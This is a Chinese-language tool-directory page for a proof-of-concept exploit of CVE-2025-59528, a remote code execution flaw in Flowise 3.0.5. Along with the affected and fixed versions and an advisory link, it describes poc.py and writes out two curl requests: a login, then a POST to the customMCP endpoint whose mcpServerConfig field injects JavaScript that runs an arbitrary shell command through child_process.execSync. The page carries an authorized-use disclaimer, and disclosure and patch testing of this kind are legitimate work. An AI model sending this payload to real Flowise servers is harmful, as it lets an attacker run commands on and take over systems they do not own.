Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-59528-PoC — CVE-2025-59528 概念验证 | Kitploit
工具/GitHubGitHub/mananispiwpiw/cve-2025-59528-poc
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubmananispiwpiw/cve-2025-59528-poc

CVE-2025-59528-PoC

CVE-2025-59528 概念验证

查看仓库
1414个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-59528 PoC

用于通过 POST /api/v1/node-load-method/customMCP 触发 Flowise CustomMCP RCE 路径的 Python 概念验证脚本。

⚠️ 仅用于教育和已获授权的安全研究。 对不属于您或未经书面许可的系统运行此工具属于非法行为。

致谢

  • im-soohyun (Kim SooHyun)

详细信息

  • 针对 CVE-2025-59528 的 PoC
  • 受影响版本:Flowise 3.0.5
  • 已修复版本:Flowise 3.0.6
  • 参考:https://github.com/advisories/GHSA-3gcm-f6qx-ff7p

文件

  • poc.py:提示输入机器 URL/IP、当使用裸主机/IP 时可选的协议、邮箱、密码和命令;登录后复用 cookie,然后发送构造的 CustomMCP 请求,并输出 HTTP 状态、请求头和响应体,类似 curl -i

用法

运行:

python3 poc.py

然后提供:

  • 机器 URL/IP,例如 10.10.11.10、http://10.10.11.10 或 https://target.example
  • 如果提示输入协议(使用裸主机/IP 时)
  • 邮箱地址
  • 目标 Flowise 实例上某个账户的密码
  • 要在服务器上执行的命令

等效的 curl 命令

第一个请求

curl -i -X POST https://<MACHINE_URL/IP>/api/v1/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"<[email protected]>","password":"<password>"}'

第二个请求

curl -i -X POST https://<target>/api/v1/node-load-method/customMCP \
  -H "Content-Type: application/json" \
  -H "x-request-from: internal" \
  -H "Cookie: token=<token>; refreshToken=<refreshToken>; connect.sid=<connect.sid>" \
  -d '{
        "loadMethod":"listActions",
        "inputs":{
          "mcpServerConfig":"({x:(function(){const cp = process.mainModule.require(\"child_process\");cp.execSync(\"<command>\");return 1;})()})"
        }
      }'
下载工具